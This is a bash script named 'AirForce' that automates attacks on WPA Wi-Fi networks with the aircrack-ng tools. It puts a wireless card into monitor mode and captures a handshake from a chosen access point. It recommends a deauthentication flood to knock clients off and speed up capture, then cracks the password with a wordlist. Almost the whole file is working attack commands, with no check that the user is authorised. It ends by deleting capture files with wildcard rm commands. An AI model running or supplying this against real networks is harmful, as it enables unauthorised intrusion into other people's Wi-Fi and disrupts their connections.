#! /bin/bash

# Check if Parameters are set
if [ "$2" = "" ]; then
  echo "Use: airforce [INTERFACE] [PATH/TO/PASSWORDLIST]"
  exit
fi

# Check if root
if [ "$EUID" != "0" ]; then
    echo "[INFO] Please run as root"
    exit
fi

echo "Welcome to AirForce!"
echo ""
echo "Setting up interfaces"
systemctl stop NetworkManager.service
killall wpa_supplicant
airmon-ng start $1

echo "First we scan for a target. We need BSSID & the channel to attack"
read -n 1 -s -p "Press any key to start dump"
airodump-ng $1mon

echo "Please choose target BSSID: "
read target
echo "please choose target channel"
read channel

echo "                         [INFORMATIONS BEFORE START]"
echo " "
echo "Wait until you got the Handshake. Without Handshake we can't crack anything!"
echo "To speed things up run as root: 'aireplay-ng --deauth 100 -a $target $1mon --ignore-negative-one' in another terminal ;D"
echo "This speedup works way better with '-c clientbssid' at the end of the line."
read -n 1 -s -p "Press any key to start attack ..."

airodump-ng -c $channel --bssid $target -w handshake $1mon --ignore-negative-one

echo "[INFO] Tagging Handshake ..."
mv handshake-01.cap $target-handshake.cap

echo "Start cracking!"
echo "[WARNING] If you do not have a valid Handshake, you need to reexec airodump-ng until you get it!"
aircrack-ng -w $2 -b $target $target-handshake.cap

echo "[INFO] Restoring interfaces"
airmon-ng stop $1mon
systemctl start NetworkManager.service
echo "[INFO] Interfaces restored"

echo "[WARNING] Clean $(pwd) ? Press [CTRL] + [C] to skip"
read -n 1 -s -p "Press any key to clean up"
rm *.kismet.netxml
rm *.kismet.csv
rm *.csv
rm *.cap

echo ""
echo "ready."
